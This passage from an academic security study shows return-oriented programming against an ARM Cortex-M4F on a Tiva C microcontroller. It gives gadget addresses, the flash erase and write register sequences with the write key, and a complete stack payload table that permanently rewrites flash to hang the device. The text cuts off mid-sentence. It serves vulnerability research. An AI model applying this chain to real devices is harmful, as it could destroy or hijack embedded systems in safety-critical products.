already been shipped [6]. With these devices widely deployed in safety-critical products, their security is vital.

The Tiva C includes the Cortex-M4F microprocessor [88], adding memory and the ability to interact with peripherals such as a Universal Asynchronous Receiver/Transmitter (UART), General-Purpose Input/Output (GPIO), and Ethernet controller [89]. It is important for the manufacturers of microprocessors and microcontrollers to have security in mind when they design these devices. Attackers would be able to wreak havoc on individuals and industries if they were able to exploit vulnerabilities in these systems for their own pernicious purposes. We have discovered that a Cortex-M4F microprocessor on a Tiva TM4C123GH6PM microcontroller can be forced to execute arbitrary code by means of Return-Oriented Programming (ROP).

2.1.1 Security versus Sustainability

The ability to secure systems has made impressive strides in recent years. End users who purchase top-of-the-line systems, configure them properly, and patch regularly can have reasonably high levels of assurance that their devices are protected from all but the most persistent and well-resourced attackers. Methods to detect and prevent buffer overflow attacks are commonplace [16, 38, 40], and similar defenses against ROP are beginning to be implemented in production systems [32, 47, 73]. Unfortunately, these protections are not extended to low-power embedded devices, as the overhead to implement them is generally incompatible with green computing goals [15]. As a result, security for green embedded and IoT devices is frequently off-loaded and handled external to the device, if at all. Specifically, external systems look for evidence of tampering either in network communications [62] or via side channel analysis [93]. Neither of these methods is effective at preventing local compromise or corruption in a device.

This research studies the case of the ARM Cortex-M4F in the Tiva C microcontroller. ARM specifies three families of processors: Cortex-A, Cortex-R, and Cortex-M. The Cortex-M family is specifically tailored for embedded system development [6], so any entity implementing a green device with the ARM architecture will do so using the Cortex-M family. Even though the Cortex-M4F is ideal for green applications, it is not ideal for security. Its only applicable security feature is its Memory Protection Unit (MPU) [17]. The MPU allows a developer to specify granular constraints for reading, writing, and executing various memory regions, which may be useful in preventing execution of malicious code injected into a data area, but is not effective at stopping ROP, which adds addresses (not code) to writable areas and only executes existing code from executable areas.

ARM does have stronger protections in place in its Cortex-A family. Cortex-A processors are intended to deliver good performance for general purpose applications, but this prioritization of performance comes at the expense of energy-efficiency. While the Cortex-A is not ideal for green applications, it is the best ARM family for secure computing as it includes a full-featured Memory Management Unit (MMU) and the ARM Trust Zone [1]. The MMU handles virtual to physical address translation, extended permissions checking capability, execute-never specification, and a non-secure bit. ARM Trust Zone creates a Trusted Execution Environment (TEE) in hardware, which causes access to trusted applications and resources to cross a trust boundary with additional scrutiny and verification.

While clearly desirable, the security features of the Cortex-A family have not been feasible to implement on energy-efficient processors like the Cortex-M4F. ARM claims that the new Cortex-M23 specification will be the best of both worlds. Announced in late 2016, the Cortex-M23 and Cortex-M33 will be the first cores in the Cortex-M family with Trust Zone hardware protection built-in [3]. Of the two, the Cortex-M23 will be specially geared towards

energy-efficiency while still providing Trust Zone security assurances. However, as of this writing, no chips or development boards with a Cortex-M23 processor are yet available, and the only public implementation is an IoT FPGA image for the Cortex-M Prototyping System, MPS2+.

2.1.2 Related Work

A topic of research that is related to this work but not included is protecting a system from buffer overflow. This has been extensively researched by others [16, 39, 40, 60]. To counter that effort, several works have been dedicated to bypassing stack protections. Buffer overflows and bypassing stack protections will not be discussed here as they have been extensively discussed elsewhere [26, 44].

Francillon and Castelluccia published their research about an ROP procedure on an Atmel AVR atmega 128 8-bit microcontroller [18, 46]. In their paper they were able to successfully demonstrate a buffer overflow and permanent code injection attack using ROP against a sensor node using this microcontroller. In order to do so they performed several buffer overflows to build a fake stack one byte at a time. This fake stack was eventually used to perform the re-write to flash memory.

Our work differs from Francillon's. We are targeting the Cortex-M4 processor, which uses the Thumb-2 instruction set, whereas the AVR atmega 128 utilizes the AVR instruction set [19]. We also employ different return strategies, which are discussed in Section 2.2.

2.1.3 Thumb Instruction Set

Cortex-M processors utilize the Thumb and Thumb-2 instruction sets. The Thumb-2 instruction set augments the original Thumb instruction set with several 32-bit instructions. The 16-bit instructions of Thumb map directly to equivalent 32-bit ARM instructions [10], although not all instructions are accounted for. The advantage is that the instructions take up less space in memory, which is desirable for a microcontroller where memory is typically at a premium [88]. For example, on a 16-bit memory system, code compiled for Thumb will typically be 65% of the size it would have been with the ARM instruction set, while providing 160% of the performance [10]. The Thumb-2 instruction set adds 32-bit instructions to the Thumb instruction set in order to allow for operations that were not previously accounted for [11].

This variable size instruction set does not introduce any insurmountable hurdles into the execution of an ROP attack on ARM devices. Some care must be taken to ensure that the processor is in the appropriate execution mode if it is capable of switching between Thumb and ARM instruction sets. Similarly, jumping into a mis-aligned instruction, while theoretically possible, introduces many potential complications and should be avoided.
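One practical consequence for payload construction: on a Thumb-only core, addresses loaded into the program counter should keep bit 0 set so execution continues in the Thumb state. A minimal sketch (the gadget addresses here are hypothetical, borrowed only for illustration) of packing a little-endian payload:

```python
import struct

def thumb_addr(addr):
    # Bit 0 of an ARM branch target selects the instruction set;
    # setting it keeps the core executing Thumb code.
    return addr | 1

gadgets = [0x01001be6, 0x010083f6]   # hypothetical gadget locations
payload = b"".join(struct.pack("<I", thumb_addr(a)) for a in gadgets)
```

Each 32-bit word on the attacker's stack therefore carries both the gadget address and the instruction-set selection in a single value.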

2.1.4 Threat Model

The threat model for this work is defined here. As previously stated, we are attacking the ARM Cortex-M4F processor using the Thumb-2 instruction set on a Texas Instruments Tiva TM4C123GH6PM microcontroller.

1. We assume that there exists a vulnerability in the code executing on the microprocessor that allows a buffer overflow to occur. Buffer overflows on the ARM architecture have been

sufficiently shown elsewhere [30].

2. No execution of code that lies on the stack will be allowed.

3. The attacker has access to the contents of the ROM on the target device in advance of the attack.

2.2 Return-Oriented Programming on ARM Architectures

The Cortex-M4 does not explicitly follow the "write xor execute" memory policy. It is, however, a modified Harvard architecture, so the stack is innately non-executable [5, 46]. The only known way to modify the control flow of a program on such a device is to use ROP techniques. ROP has been proven to be effective at bypassing execution protections on ARM-based devices [29]. Tim Kornau created an extensive work outlining ROP against the ARM architecture [57], in which the author specifically attacks a mobile phone running Windows Mobile 6.x.

There exist several differences between ROP on the ARM architecture and the x86 architecture [63]. A major difference lies in the structure of the gadget needed; ARM lacks the straightforward return instruction that x86 provides. Routines instead use other specialized instructions to change control flow between different sections of code. This is very important for ROP on a resource-constrained device. Because the code base to search for gadgets is limited, the attacker must be creative in finding return-like instructions that will allow them to maintain control of the code execution after each gadget. We identify four control-flow mechanisms used in ARM that can accomplish this purpose, which enlarges the set of gadgets available to us.



The first of these control flow mechanisms is the push and pop set of instructions. A program utilizes these by storing register values on the stack by means of the push instruction before executing a new routine. When that routine is completed, the state of the registers is restored by pulling the previously stored values back off the stack by means of the pop instruction. In this style of routine call, the program counter is one of the registers stored on the stack, meaning that if a pop instruction is found that contains the program counter register (and ideally no others), it can be treated in the same manner as a return instruction in x86 architectures. Figure 2.1 is a stack diagram which depicts an example of this type of return-like mechanism.
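The double use of such a ldr/pop gadget can be sketched with a toy Python pseudo-machine (not real ARM; the memory contents are invented, and the gadget address is the one from Figure 2.1):

```python
MEM = {0x20000004: 0xDEADBEEF}   # hypothetical word the attacker wants

def gadget(regs, stack):
    # Models the gadget: ldr r0, [r4, 4]; pop {r4, pc}
    regs["r0"] = MEM.get(regs["r4"] + 4, 0)   # ldr r0, [r4, 4]
    regs["r4"] = stack.pop(0)                 # pop {r4, ...
    return stack.pop(0)                       # ... pc} -> next address

regs = {"r0": 0, "r4": 0}
# Overflowed stack: the r4 of our choosing, then the gadget's own address
# so it runs a second time, then filler for the final r4/pc pops.
stack = [0x20000000, 0x01001be6, 0x0, 0x0]
pc = gadget(regs, stack)   # first pass only pre-loads r4
pc = gadget(regs, stack)   # second pass performs the load into r0
```

The first invocation wastes its load but seeds r4 from the stack; the second performs the intended read, exactly the call-it-twice pattern described for the gadget in Figure 2.1.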

[Stack diagram omitted.]

Figure 2.1: Example of using a pop pc as a return. This gadget (ldr r0, [r4, 4]; pop {r4, PC} at 0x01001be6) loads the value from memory location [r4+4] into r0. Note that it assumes that r4 is pre-loaded, but it also happens to pop a value into r4 before returning; therefore, it can be called twice, the first time putting the desired r4 on the stack.

The second control flow mechanism is a branch instruction that uses another special purpose register called the link register. Routines utilizing this style of return simply call another routine with the specialized bl or blx instruction, which loads the link register with the appropriate return address before branching to the new location. At the end, the called routine loads the link register to the program counter, and execution returns to the original point. This second method has some subtleties that require more attention than the simple pop instruction. First, this style does not allow nested routine calls, as the inner call would overwrite the original value in the link register without being able to restore it. Therefore,

the link register must be stored onto the stack using a push before the call, and restored after the call with a pop. Secondly, because the link register is used as the return address, it must be loaded with the address of the next gadget before being used as a gadget return.

These sequences can be combined to allow branches to the link register to be used as an equivalent of return for ROP gadgets. Code which uses a pop to restore the link register from the stack after a call using the bl instruction can be used as a gadget to load the link register with the address of a pop of the program counter. Once this is accomplished, all branches to the link register will jump to the pop of the program counter, which will then pull the next address from the stack as in a traditional ROP attack. If a pop instruction containing both the link register and program counter is found, the link register can be conveniently loaded in a single gadget.

This bears some similarity to the update-load-branch technique described in [30], which searches for gadgets characterized by indirect branches to the address held in a register which is loaded in a directly preceding instruction. The use of the bx lr instruction allows for a less complicated gadget sequence, where the address of a pop pc instruction is placed in the link register to provide what [30] refers to as a trampoline. This means that our approach does not need to use additional registers to maintain control flow and also does not need to provide an explicit ability for advancing the stack pointer, two limitations of the work in [30]. Instead, the sequence of gadgets using our method is to simply first load the link register with the address of a pop pc instruction, and then call any number of gadgets ending with a bx lr instruction.
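The chaining just described can be illustrated with a toy interpreter (not real ARM; the addresses and gadget bodies are invented, and the link register is assumed to already hold the trampoline address):

```python
GADGETS = {                       # invented addresses -> gadget behavior
    0x100: "pop_pc",              # pop {pc}       -- the trampoline
    0x200: "store_bx_lr",         # str r2, [r0];  bx lr
    0x300: "add_bx_lr",           # adds r0, r2;   bx lr
}

def run(chain, trampoline=0x100):
    lr = trampoline               # LR loaded once with a pop {pc} address
    stack = list(chain)
    executed = []
    pc = stack.pop(0)             # overwritten return address starts it
    while True:
        kind = GADGETS[pc]
        executed.append(kind)
        if kind == "pop_pc":
            if not stack:
                break             # chain exhausted
            pc = stack.pop(0)     # next gadget address comes off the stack
        else:
            pc = lr               # bx lr bounces through the trampoline
    return executed

order = run([0x200, 0x300])
```

Every bx lr gadget returns through the same pop {pc} trampoline, which pulls the next gadget address from the attacker-controlled stack, so the link register only needs to be loaded once.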

The mechanics of this gadget return style are demonstrated in Figure 2.2, which gives an example of a simple store gadget. First, a load immediate gadget puts the address of the gadget using the bx lr return onto the stack. Next, a pop gadget fills the link register with the address of a pop pc instruction (outlined in red). Finally, the unconditional branch jumps to the location of the bx lr gadget, which is in this case a simple store instruction. Note that any subsequent gadgets that use the bx lr return do not need to load the link register again, unless it is overwritten as some gadget's side effect. Any time the bx lr instruction is executed it will immediately jump to the pop pc instruction, which will in turn load the next gadget address from the stack into the program counter.

[Stack diagram omitted. The chain shown: pop {r1, r6, PC} at 0x010083f6 loads r1 with the address of the store gadget (0x010026ea); then pop.w {r4, LR}; bx r1 at 0x01006990 fills LR with the address of a pop {PC} before branching to the store gadget (str r2, [r0]; ...; bx lr).]

Figure 2.2: Stack Diagram - bx lr Return.

A third control flow mechanism is a direct branch to an address held in a register. This can also be utilized by first loading the register with the address of the next gadget. These branches do not occur as often in code, but where found they provide an opportunity. An example of this style of return can be seen in Figure 2.2, where the pop instruction responsible for loading the link register is followed by an unconditional branch to the address held in r1.

The fourth control flow mechanism is a branch with link to a general-purpose register. This appears as blx reg, where reg may be any general-purpose register such as r1, r2, r3, and so forth. This is very similar to the third control flow mechanism of bx r1. However, the blx instruction not only updates the pc with the address specified by the value stored in the register, it also stores the address of the next instruction after the blx instruction in the lr register [87]. This is the equivalent of an x86 function call that stores the return address, and is used in [30]. An example of this can be seen in Figure 2.3 found in Section 2.4.1.

2.3 Erasing and Programming Flash Memory

This section describes two sets of gadgets for an ROP carried out on the Texas Instruments Tiva TM4C123GH6PM containing an ARM Cortex-M4F processor [88] revision 1. The Thumb-2 instruction set is utilized. The Cortex-M4F is designed to be integrated with a ROM which contains peripheral drivers [17]. Addresses 0x01000000-0x1FFFFFFF are reserved for the ROM containing the TivaWare for C Series software. The first set of gadgets is shown to demonstrate that even if the ROM were eliminated, this would not make ROP impossible. The first attack uses gadgets taken from an example program meant to demonstrate the Sensor Hub BoosterPack, BOOSTXL-SENSHUB [4], an available daughter card for the Tiva C. The search space of gadgets for the first ROP example includes addresses 0x00000000 to 0x00005AA8. The second set of gadgets can be found on the ROM.

Either set of instructions could be used with a buffer overflow to reprogram the flash memory of the microcontroller. This work is not focused on the method of the buffer overflow attack itself. However, it is assumed that a buffer overflow must occur to initiate the ROP procedure. Proof of successful buffer overflow has been sufficiently demonstrated on the ARM architecture [30].

A denial of service attack could be accomplished by simply erasing the region of flash memory which starts the default program's execution and then restarting the microcontroller. Once that region of memory is blank, the microprocessor would not be able to boot. A second attack could be carried out by reprogramming that portion of flash memory with an arbitrary sequence of instructions after it had been erased. This second exploit is illustrated in both examples.

2.3.1 Finding Gadgets

To find the first set of gadgets, we disassembled the binary of the example program and used that to search for gadgets. For the second, we extracted the ROM binary file from the microcontroller and used its contents to locate gadgets. The open-source Radare2 [9] disassembler revealed the assembly-code contents of the peripheral drivers included by Texas Instruments on the ROM.

After that, we ran simple grep commands against the resulting files as the starting point in the search for gadgets. However, more sophisticated methods than grep exist to find gadgets. Because the ARM instruction set is published and Kornau has demonstrated automated searches for gadgets in ARM code, open-source tools exist to assist in the search for gadgets [7, 57]. ROPgadget.py, an open-source Python script, significantly sped up the search for gadgets [79]. Several sources on the ARM architecture also proved to be invaluable in the search for gadgets [2, 34, 99].
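A stripped-down version of this search can be sketched as a scan of disassembly text for return-like instructions. The disassembly lines below are fabricated (real radare2 or ROPgadget output differs), but the pattern reflects the four gadget-ending mechanisms of Section 2.2:

```python
import re

# Fabricated disassembly lines in an "address instruction" shape:
disasm = """\
0x01001be6 ldr r0, [r4, 4]
0x01001be8 pop {r4, pc}
0x010026ea str r2, [r0]
0x010026ec bx lr
"""

# Instructions that can end a gadget: a pop that includes pc, a branch
# through the link register, or a (b)(l)x through a general register.
pat = re.compile(r"pop \{[^}]*pc\}|bx lr|bx r\d+|blx r\d+")
ends = [line.split()[0] for line in disasm.splitlines() if pat.search(line)]
```

Instructions preceding each match become gadget candidates; tools like ROPgadget automate exactly this enumeration over the raw binary.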

ROPgadget.py allows users to extract all candidate ROP gadgets from a binary code segment. Run against the ROM file with the ARM architecture and Thumb(-2) instruction mode specified, it yielded 6236 potential gadgets:

ROPgadget --binary rom.bin --rawArch=arm --rawMode=thumb --thumb > ropG

We were then able to search through this candidate list to find gadgets or chains of gadgets that formed our Turing-complete ROP instruction set.

2.3.2 Reprogramming Method

In the following attack, the goals of erasing and programming the flash are achieved. The procedures to perform these flash memory operations are found in Section 2.3.2. Gadgets to perform the first exploit are described in Section 2.3.3 and for the second in Section 2.3.4. The character sequence placed on the stack is demonstrated in Section 2.3.3.

Flash Memory Write Sequence

In order to accomplish goals one and two, the procedure to erase and write to the flash of the Tiva C must be understood. Programming the flash can only change a bit that is already a 1 to a 0, or leave the bit at its current value. Programming cannot transition a 0 to a 1. Based on this limitation, it is unlikely for any attack to be successful without first erasing portions of flash.
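This one-way property can be modeled in a few lines (a sketch only: program as a bitwise AND, erase as all-ones), using the instruction words from Listing 2.3 as sample data:

```python
FLASH_ERASED = 0xFFFFFFFF

def erase():
    # Erase sets every bit in the block to 1.
    return FLASH_ERASED

def program(word, value):
    # Programming can only clear bits: 1 -> 0 is possible, 0 -> 1 is not.
    return word & value

word = program(erase(), 0xF1000001)
```

Programming the already-written word a second time can only clear further bits, never restore them, which is why the attack must erase before rewriting.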

First the flash must be erased and then programmed. This memory is erased by setting all bits to 1. The flash on the Tiva C can be erased completely or in 1 kB blocks; the attack utilizes a 1 kB erasure. The erase procedure is as follows: first, identify the start address of the 1 kB-aligned (CPU) byte address which specifies which block of flash is the target for the erasure. Next, place that address into the Flash Memory Address (FMA) register at 0x400FD000. Finally, the write key must be loaded into bits 16 to 31 of the Flash Memory Control (FMC) register at 0x400FD008 and the erase bit (bit 1) must be set. The write key is determined by the state of the key bit (bit 4) of the Boot Configuration (BOOTCFG) register at 0x400FE1D0. The possible values of the write key are 0x71D5 or 0xA442 for 0 or 1, respectively. In this case the key bit is set to 1, indicating the value of the write key to be 0xA442. Thus the 32-bit value that must be entered into the FMC register to erase the 1 kB block is 0xA4420002. The erase sequence can be found in Listing 2.1. In the attack

demonstrated in Section 2.3, the start address of main happens to be located at 0x4BA0 and the minimum block size of flash memory that can be erased is 1 kB. Therefore, the start address for the erase is 0x00004800. When this procedure is carried out, all bits between 0x00004800 and 0x00004BFF in the flash will be set to 1, which includes the start address of main. If the desire were to erase the entire flash instead of just a 1 kB block, simply write the key to the upper 16 bits of the FMC register and set the Mass Erase (MERASE) bit (bit 2). This can be seen in Listing 2.2.

Listing 2.1: Flash erasing sequence for the Tiva C.

    // address of FMA register
    uint32_t * FLASH = (uint32_t *) 0x400FD000;
    FLASH[0x0] = 0x4800;      // address to erase
    // clear the area 0x4800-0x4BFF
    // perform erase command by writing to FMC register
    FLASH[0x2] = 0xA4420002;

Listing 2.2: Mass erasing sequence.

    // address of FMA register
    uint32_t * FLASH = (uint32_t *) 0x400FD000;
    // erase entire flash by writing the key and
    // setting the MERASE bit of FMC register
    FLASH[0x2] = 0xA4420004;
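The FMC values in Listings 2.1 and 2.2 decompose into the write key in the upper half-word and a command bit in the lower, which a short sketch makes explicit:

```python
WRITE_KEY = 0xA442             # selected when the BOOTCFG key bit is 1
WRITE, ERASE, MERASE = 1 << 0, 1 << 1, 1 << 2

def fmc_command(bit):
    # Key in bits 16-31, command bit in the low half-word.
    return (WRITE_KEY << 16) | bit
```

Composing command words this way also shows why the attacker's ROP chain only needs a store gadget: each operation is a single 32-bit constant written to a fixed register address.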

Once all bits are erased (set to 1) in the region that is to be re-programmed, the flash is prepared to be written. The flash write procedure begins with writing the address to be programmed to the same FMA register described in the flash erase procedure. Then the 32-bit word to be written is placed in the Flash Memory Data (FMD) register at 0x400FD004. Finally, the same write key is written to the upper 16 bits of the FMC register as described above; however, during a program command the write bit (bit 0) is set. The programming procedure for writing the exploit program can be seen in Listing 2.3.

An alternate programming procedure includes writing the address to be programmed into the FMA as seen earlier. Then the desired words are written to the appropriate Flash Write Buffer n (FWBn) registers, 0x400FD100 to 0x400FD17C. This technique allows up to 32 32-bit words to be written to the flash at once. Then the Flash Write Buffer Valid (FWBVAL) register at 0x400FD030 must be set to a mask indicating which FWBn registers are to be written; in the case of this example, all 32 bits are set. Finally, the Flash Memory Control 2 (FMC2) register, at 0x400FD020, is written to. This register is very similar to the FMC register: the write key is entered into the upper 16 bits and the write buffer bit (bit 0) is set. Listing 2.4 illustrates this second method to program the flash. The first programming procedure writes one word at a time and is therefore easier to follow, while the second allows up to 32 words to be written at the same time. As can be seen, Listings 2.3 and 2.4 both write the same words to the same addresses, but Listing 2.4 requires one less instruction because it only needs to write the address and the flash control command once. This simplification reduces the stack space needed for the exploit, which is helpful when attacking a resource constrained device.
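Since the listings index the controller through a word-sized pointer, each FLASH[] index is simply the register's byte offset from 0x400FD000 divided by four. A quick sketch confirms the indices used in Listings 2.3 and 2.4:

```python
BASE = 0x400FD000
# Byte offsets of the flash controller registers named in the text.
OFFSETS = {"FMA": 0x000, "FMD": 0x004, "FMC": 0x008,
           "FMC2": 0x020, "FWBVAL": 0x030, "FWB0": 0x100}
# Word index used by the uint32_t pointer in the listings.
INDEX = {name: off // 4 for name, off in OFFSETS.items()}
```

For instance, FMC2 lands at index 0x8 and FWBVAL at 0xC, matching the FLASH[0x8] and FLASH[0xC] stores in Listing 2.4; FLASH[0x48] is eight words past FWB0, i.e. buffer offset 0x20.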

Listing 2.3: Tiva C flash programming sequence.

// place address to program (main) into FMA
FLASH[0x0] = 0x4BA0;
// assembly add instruction placed in FMD
FLASH[0x1] = 0xF1000001;
// write command - write key and write bit to FMC
FLASH[0x2] = 0xA4420001;
// second address to program placed into FMA
FLASH[0x0] = 0x4BA4;
// assembly branch instruction placed in FMD
FLASH[0x1] = 0xE7FC0000;
// write command - write key and write bit to FMC
FLASH[0x2] = 0xA4420001;

Listing 2.4: Alternate Tiva C flash programming sequence.

// base address to program: 0x4B80 is the closest
// 32-word aligned address to main at 0x4BA0
FLASH[0x0] = 0x4B80;
// load add instr into FWBn - offset of 0x20
FLASH[0x48] = 0xF1000001;
// load branch instr into FWBn - offset of 0x24
FLASH[0x49] = 0xE7FC0000;
// set every bit in FWBVAL register
FLASH[0xC] = 0xFFFFFFFF;
// write key and set WRBUF bit of FMC2 register
FLASH[0x8] = 0xA4420001;

2.3.3 Demonstration of Writing a Simple Program to Flash

Here we show a demonstration in which the flash is reprogrammed with a sequence of instructions that no longer executes the original program at all, but instead simply enters an infinite loop. This loop begins immediately after the ROP is performed. In addition, it will start again if the system reset push-button is ever pressed or if the Tiva C is powered off and then back on, as the loop now resides in the flash memory at the location of main. This example proves that an attacker is able to erase the flash memory and reprogram the microcontroller.

Gadgets

This example ROP procedure demonstrates that even a small amount of existing code can be leveraged by a creative attacker. The search space for gadgets for this attack was limited to the example Sensor Hub Booster Pack program. The flash rewrite sequence contained in Listings 2.3 and 2.4 requires two operations: load and store. The search yielded two gadgets, of two lines each, which can accomplish these tasks. They are shown in Listing 2.5.

Listing 2.5: Gadgets that provide the load and store operations.

; Gadget A at 0x3673
str r0, [r4, #0x0]
pop {r4, pc}
; Gadget A0 at 0x3675
pop {r4, pc}
; Gadget B at 0x42A7
mov r0, r4
pop {r4, pc}

Gadget A provides the ability to store data from r0 into the address specified in r4. It also causes the program to jump to the next gadget while filling r4 with more data from the stack. This gadget is effective because r4 is constantly updated and can thus be used to load immediate values off the stack. Note that Gadget A0 is the second line of Gadget A and is useful when the str operation on the first line is not needed. It is only used as the first gadget in the chain, as there is no need for a store before a value has been popped into r4 for the first time.

Gadget B transfers the data from r4 into r0. There were no gadgets that would load r0 directly, so this method was a sufficient substitute. Data is transferred from the stack to r4 by using Gadget A0, followed by Gadget B, where the data is shuttled to r0 while r4 is repopulated. Finally, the data is stored into the desired location via Gadget A.

ROP Procedure

The design of the ROP was taken directly from the code in Listings 2.1 and 2.4. The flash programming method shown in Listing 2.4 was chosen because it needed only 5 total writes to flash registers, while the sequence in Listing 2.3 required 6. The gadgets from Listing 2.5 were combined in a pipelined fashion in order to minimize operations. The implementation was still rather bulky at 23 required returns. Table 2.1 describes the order in which the gadgets should be executed in order to rewrite the flash memory of the microcontroller.

The ROP attack was first approached by determining the size and boundaries of the stack. Once the boundaries were determined, the location on the stack where the program counter

(pc) was stored was overwritten with the address of Gadget A. Each successive call (shown in Table 2.1) was determined by overwriting the values to be placed into the r4 and pc registers.

This attack was successful and resulted in the flash being permanently reprogrammed. Even after the reset button of the Tiva C was pressed, an infinite loop was entered and nothing else was ever executed. This was verified by stepping through execution on the Tiva C using a debugger.

2.3.4 Second Gadget Set

The second set of gadgets can be seen in Listing 2.6. This gadget set was derived entirely from the ROM. We will not illustrate the second ROP procedure here, as it uses the flash erase and re-write procedures found in Section 2.3.2, and the procedure is very similar to that of Section 2.3.3. Using the four gadgets in Listing 2.6 we were able to successfully replicate a ROP sequence similar to the one already illustrated. The purpose of this exercise is to demonstrate the ability to find a gadget set in the ROM similar to the gadget set already found in the code of a basic program.

Table 2.1: The ROP design.

Gadget | Pop into r4 | Pop into PC | Description
       | 0x30303030  | 0x30303030  | Don't care
       | 0x30303030  | 0x30303030  | Don't care
       | 0x00000000  | 0x00000000  | Don't care
       | 0x00000000  | 0x00000000  | Don't care
       | 0x00000000  | 0x00000000  | Pop {r4-r5} pop {pc}
       |             | 0x75360000  | Return to A0
A0     | 0x00480000  | 0xa7420000  | Erase address
B      | 0x00d00f40  | 0x73360000  | Write erase address
A      | 0x020042a4  | 0xa7420000  | Erase command
B      | 0x08d00f40  | 0x73360000  | Write erase command
A      | 0x804b0000  | 0xa7420000  | main address
B      | 0x00d00f40  | 0x73360000  | Write main address
A      | 0x00f10100  | 0xa7420000  | add r0,#0x1
B      | 0x20d10f40  | 0x73360000  | Write add
A      | 0xfce75555  | 0xa7420000  | b main
B      | 0x24d10f40  | 0x73360000  | Write b
A      | 0xffffffff  | 0xa7420000  | Clear write buffer
B      | 0x30d00f40  | 0x73360000  | Write clear
A      | 0x010042a4  | 0xa7420000  | Flash key
B      | 0x20d00f40  | 0x73360000  | Write flash key
A      | 0x584b0000  | 0xa7420000  | Scatter addr
B      | 0x00d00f40  | 0x73360000  | Write scatter addr
A      | 0x42e00000  | 0xa7420000  | b main
B      | 0x18d10f40  | 0x73360000  | Write b main
A      | 0xffffffff  | 0xa7420000  | Clear write buffer
B      | 0x30d00f40  | 0x73360000  | Write clear
A      | 0x010042a4  | 0xa7420000  | Flash key
B      | 0x20d00f40  | 0x73360000  | Write flash key
A      | 0x00000000  | 0xa14b0000  | Return to main

Listing 2.6: Gadgets 1-4, which provide the functionality to erase and reprogram memory.

; Gadget 1 at 0x01007550
pop {r0, r1, r3, r6, pc}
; Gadget 2 at 0x010067aa
str r0, [r1, #0]
pop {r4, pc}
; Gadget 3 at 0x01006990
ldmia.w sp!, {r4, lr}
bx r1
; Gadget 4 at 0x01001024
subs r0, #1
bne.n 0x1001024
bx lr

The first gadget is a simple command that pops five values off of the stack. The first four values are stored in registers and the last value is placed in the program counter (pc). This is a very useful gadget because a command that pops the pc off of the stack can be used as a branch command: the address popped into the pc will be the next command executed by the program.

The second gadget is used to store a value in memory. The value in r0 is stored to the address in r1. This gadget is particularly useful because it stores a 32-bit value to an address without an offset; many of the possible gadgets in the provided code space will only store bytes or halfwords and require an offset, and more analysis and longer gadgets would be required for those to be used. Another important feature is that it ends with a pop command that includes the pc, so it can be used as a branch to the next gadget.

The ldmia.w command of the third gadget is used as a load immediate, since the values it loads come from the attacker-controlled stack. The registers in the curly brackets are loaded with the values located at the address given by the first argument; if there is more than one register in the brackets, the word at each successive address is loaded into each following register. In this case, the value at the Stack Pointer (sp) is loaded into r4, and the next value on the stack is loaded into the Link Register (lr). Then the program branches to the address in r1. This gadget is very useful because it manipulates the link register.

The last gadget is a subtraction command to be used as a delay for the erase and write commands. Whenever a word is written to or erased from flash memory, a delay of between 50 µs and 300 µs is required, and this gadget provides a delay long enough for the write or erase command to complete. Register r0 is preloaded with the wait value. Because subs sets the zero flag when its result is 0, the command can also act as a comparison: if the result is not equal to zero, the program branches back to the beginning of the gadget at 0x1001024. The program loops through the subs command until the result reaches 0, at which time it branches to the address in the lr.

2.4 Turing-complete Gadget Set

The ultimate goal of an attacker in crafting a ROP library of gadgets is to establish a Turing-complete gadget set. This allows the attacker to accomplish an arbitrary computation using a single predefined gadget set, and even to go as far as creating a specialized compiler capable of generating an attack payload directly from C code [54].

The successful generation of such a gadget set depends heavily on the size and nature of the code base that is available to the attacker. An ideal environment for the attacker includes standard libraries that can be relied on for widespread functionality. However, in embedded systems this is often not the case, as memory is at a premium and only specialized libraries are available. For example, a library designed specifically for the purpose of configuring device peripherals will likely lack the explicit functionality needed to perform complex arithmetic operations. Similarly, a library that provides such mathematical operations may be lacking the load and store instructions needed to work with the device memory. It is also possible that while a particular functionality exists within the library, there are instructions between the desired code and the return instruction which lead to undesirable side effects of the gadget.

The attacker may overcome such limitations with a careful and methodical approach. The attacker first builds a gadget set containing as many pure gadgets (that is, gadgets free from side effects) as can be found; these may then be combined to perform more complex operations. An xor instruction may be used to create gadgets for register clearing, register value swapping, and other operations such as negate. Gadgets for saving and restoring states and register values are also very useful, as these allow gadgets with side effects to be used between a save/restore pair to avoid the unwanted consequences. By starting with the simplest gadgets and acquiring this functionality as early as possible, more complex functionality can be implemented without finding specific gadgets for each and every operation.

The basic starting gadgets that provide this base to build on are easy to identify. Immediate loads of registers are almost trivial: all that is needed is a pop instruction that includes both the program counter and the register in question. Similarly, loads and stores can simply be used directly as long as a gadget return follows close behind. In contrast, a gadget for the equivalent of a branch instruction poses significant difficulty. Conditional execution of one of two gadgets (the equivalent of the if-then-else, or ite, instruction) can be accomplished by utilizing the same instruction in the code, as detailed in the conditional execution gadget below.

A fully-featured conditional branch gadget is much more challenging. To simulate the conditional branches of the instruction set, the gadget must be capable of executing gadgets ahead in the stack, jumping over others if they are unneeded. The branch must also be capable of returning to an earlier point in the gadget sequence, looping back on itself and allowing gadgets to repeat. This backwards motion is an essential programming paradigm and is necessary for a Turing-complete set of gadgets, as both forward and backward motion must be present in a Turing machine [86].

Executing gadgets that are further ahead in the sequence can be accomplished without much trouble. A pop instruction removing several values from the stack can be conditionally executed, several times if necessary, to skip the gadgets that should not be executed. A gadget that increments the stack pointer can also be used to adjust the next gadget to execute more efficiently.

Gadgets that decrement the stack pointer are much more difficult to identify. While there is code in the library in question that decrements the stack pointer, it is followed by an increment operation before any return statement, such that a gadget cannot be built from it. An attacker would need to identify a way to either decrement the stack pointer to jump to previous gadgets, or copy the previous addresses in the stack to the next portions so that they are executed once again. We introduce a gadget that is capable of this backward looping in this work.

2.4.1 Requirement

In order to show that our collection of gadgets is Turing-complete, we follow the approach of Homescu et al. [52], who attempt to create a Turing-complete gadget set in which each gadget occupies the fewest bytes possible. The required functionality comprises twelve gadgets. We capture the same functionality in our gadget set, but not in the same way. For example, the authors of [52] included two gadgets whose only purpose was to operate on system flags, while this functionality is built into our gadgets where needed. We were not attempting to identify the smallest possible gadgets, so this method worked for our needs. Besides the flag operations, the set of gadgets identified by [52] includes functionality to move or exchange register values, pop a value from the stack into a register, control the stack pointer, increment or decrement a value in a register, load a value from an address to a register, store a value to memory, add two values, and subtract two values. In addition to the above functionality, the logical operations and, or, xor, and not are needed. The authors of [52] remind us that, because of De Morgan's laws, only two gadgets are really needed to create the behavior of all of these logical operations: one of and or or, together with one of xor, not, or neg. We chose to identify all of these gadgets, although the xor gadget is perhaps impractically large. The final functionality needed to make a gadget set Turing-complete is the ability to compare two values and branch based on the result. This section describes the gadgets we have found which cover all of this 